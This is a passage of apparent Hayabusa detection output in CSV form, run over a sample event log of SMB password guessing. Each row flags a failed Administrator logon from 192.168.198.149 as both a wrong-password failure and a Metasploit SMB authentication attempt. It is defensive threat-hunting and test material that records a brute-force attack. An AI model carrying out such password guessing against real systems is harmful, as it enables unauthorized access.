NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
